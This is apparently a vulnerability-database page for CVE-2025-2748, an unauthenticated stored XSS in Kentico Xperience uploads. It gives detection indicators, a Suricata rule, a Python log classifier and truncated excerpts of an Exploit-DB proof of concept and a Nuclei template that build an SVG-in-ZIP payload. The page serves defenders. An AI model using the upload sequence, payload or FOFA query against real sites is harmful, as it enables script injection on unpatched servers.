CVE-2025-2748
Published 2025-03-24
Priority P179 · medium · 6.1 (CVSS 3.1)
AV:N AC:L PR:N UI:R S:C C:L I:L A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 59.07% (99.0th percentile)
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS. This issue affects Kentico Xperience through 13.0.178.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kentico | xperience | <= 13.0.178 | — |
Detection & IOCs (extracted from sources)
- URL: `/CMSPages/GetResource.ashx?image=/App_Data/CMSTemp/MultiFileUploader/00/00000000-0000-0000-0000-000000000000/`
- Request: `POST /CMSModules/Content/CMSPages/MultiFileUploader.ashx?Filename=<zip>&Complete=false` with `Content-Type: application/octet-stream`

Snort/Suricata rule:

```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Kentico Xperience CMS Cross Site Scripting via Unauthenticated File Upload Attempt (CVE-2025-2748)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/CMSModules/Content/CMSPages/MultiFileUploader.ashx|3f|"; fast_pattern; startswith; content:"Filename|3d|"; content:".zip"; within:150; content:"Complete|3d|false"; reference:cve,2025-2748; reference:url,labs.watchtowr.com/xss-to-rce-by-abusing-custom-file-handlers-kentico-xperience-cms-cve-2025-2748/; classtype:attempted-admin; sid:2061259; rev:1; metadata:affected_product Kentico_Xperience_CMS, attack_target Web_Server, tls_state plaintext, created_at 2025_04_03, cve CVE_2025_2748, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_04_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
```
- Detect unauthenticated POST requests to MultiFileUploader.ashx with a .zip filename and the Complete=false parameter; this is the core upload vector for CVE-2025-2748.
- Detect retrieval of the uploaded SVG payload via GetResource.ashx referencing the CMSTemp MultiFileUploader staging path; this indicates exploitation stage 2 (the XSS trigger).
- Match the response body for 'alert(document.domain)' combined with Content-Type 'image/svg+xml' to confirm successful XSS payload delivery from the uploaded SVG.
- Use the FOFA query 'app="Kentico-CMS"' to identify exposed Kentico Xperience instances for proactive scanning.
- The exploit packages a malicious SVG inside a ZIP archive; look for ZIP uploads (Content-Type: application/octet-stream) to MultiFileUploader.ashx containing embedded SVG files with script tags.
- The Nuclei template uses a hardcoded GUID path (00000000-0000-0000-0000-000000000000) for the staging directory; actual deployments may use different GUIDs, requiring path enumeration.
- The vulnerability is unauthenticated (PR:N), meaning no session or credentials are required to upload the malicious ZIP; perimeter-facing Kentico instances are directly exploitable.
- The Snort/ET rule only covers plaintext (non-TLS) traffic; HTTPS-protected Kentico deployments will not be detected by this signature without TLS inspection.
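As an added example (not code from the page or from any of the indexed sources), the following Python classifies constructed web-server request lines against the two request patterns described in the notes above. It assumes a simple "METHOD TARGET STATUS" line format, mirrors the ET rule's case-sensitive `.zip`-within-150-bytes check for the upload stage, and accepts any staging GUID rather than only the all-zero one from the Nuclei template.

```python
import re
from typing import List, Optional, Tuple

# Added example: classifies request lines against the upload and retrieval
# patterns from the detection notes. Log format is assumed: "<METHOD> <TARGET> <STATUS>".
UPLOAD_PATH = "/CMSModules/Content/CMSPages/MultiFileUploader.ashx"

# Stage 2: fetch from the CMSTemp staging directory. Any GUID is accepted, since
# the all-zero GUID in the Nuclei template is only one possible value.
STAGING_RE = re.compile(
    r"/CMSPages/GetResource\.ashx\?image=/App_Data/CMSTemp/MultiFileUploader/"
    r"[0-9a-fA-F]{2}/[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}/"
)


def classify_request(line: str) -> Optional[str]:
    """Return "upload" for the staging-upload pattern, "retrieve" for a fetch
    of a staged file, or None when the request matches neither."""
    parts = line.split()
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    path, _, query = target.partition("?")
    # Stage 1: POST of a .zip with Complete=false. Mirrors the ET rule's content
    # matches: ".zip" within 150 bytes after "Filename=", case-sensitive (no nocase).
    if method == "POST" and path == UPLOAD_PATH:
        i = query.find("Filename=")
        if i >= 0 and ".zip" in query[i + 9:i + 159] and "Complete=false" in query:
            return "upload"
    if method == "GET" and STAGING_RE.search(target):
        return "retrieve"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, classification) for every matching line."""
    hits = []
    for idx, line in enumerate(lines):
        kind = classify_request(line)
        if kind:
            hits.append((idx, kind))
    return hits


# Constructed sample log lines; the GUID on the second line is made up.
SAMPLE_LOG = [
    "POST /CMSModules/Content/CMSPages/MultiFileUploader.ashx?Filename=photos.zip&Complete=false 200",
    "GET /CMSPages/GetResource.ashx?image=/App_Data/CMSTemp/MultiFileUploader/1a/5b0c9d2e-1111-2222-3333-444455556666/ 200",
    "POST /CMSModules/Content/CMSPages/MultiFileUploader.ashx?Filename=report.pdf&Complete=false 200",
    "GET /CMSPages/GetResource.ashx?image=/App_Data/Media/logo.png 200",
]
```

Running `scan(SAMPLE_LOG)` flags only the first two lines (upload, then retrieve); like the ET rule, this sees nothing on TLS traffic unless the logs come from the web server itself or a TLS-inspecting proxy.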
CVSS provenance
- NVD (v3.1): 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- VulnCheck: 6.1 MEDIUM
GHSA
GHSA-fx68-23vp-xpxr · ghsa_unreviewed · 2025-03-24 · CWE-79 · MEDIUM
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS. This issue affects Kentico Xperience through 13.0.178.
VulnCheck
Kentico Xperience CMS Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') · vulncheck · 2025 · MEDIUM · CVSS 6.1
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS. This issue affects Kentico Xperience through 13.0.178.
Affected: Kentico Xperience CMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-2748
Exploit PoC: https://vulncheck.com/xdb/ed621dde3001
Suricata
ET WEB_SPECIFIC_APPS Kentico Xperience CMS Cross Site Scripting via Unauthenticated File Upload Attempt (CVE-2025-2748) · suricata · 2025-04-03 · MEDIUM · CVSS 6.1
Rule: sid 2061259 (the full rule text is listed under Detection & IOCs above).
Exploit-DB
Kentico Xperience 13.0.178 - Cross Site Scripting (XSS) · exploitdb · 2025-05-13 · CVE-2025-32370 · MEDIUM · CVSS 6.1
---

```python
# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: [email protected]
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370
import requests
import subprocess
import os
import argparse


def create_svg_payload(svg_filename: str):
    print(f"[*] Writing malicious SVG to: {svg_filename}")
    svg_payload = '''
alert("XSS");
'''
    with open(svg_filename, 'w') as f:
        f.write(svg_payload)


def zip_payload(svg_filename: str, zip_filename: str):
    print(f"[*] Creating zip archive: {zip_filename}")
    subprocess.run(['zip', zip_filename, svg_filename], check=True)


def
```
Nuclei
Kentico Xperience CMS - Unauthenticated Stored XSS · nuclei · MEDIUM · CVSS 6.1
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS. This issue affects Kentico Xperience through 13.0.178.
Template:

```yaml
id: CVE-2025-2748

info:
  name: Kentico Xperience CMS - Unauthenticated Stored XSS
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This issue affects Kentico Xperience through 13.0.178.
  impact: |
    Unauthenticated attackers can upload malicious SVG files containing JavaScript payloads that persist on the server, allowing stored XSS attacks when the
```
No writeups or analysis indexed.
2025-03-24: published. Exploited in the wild.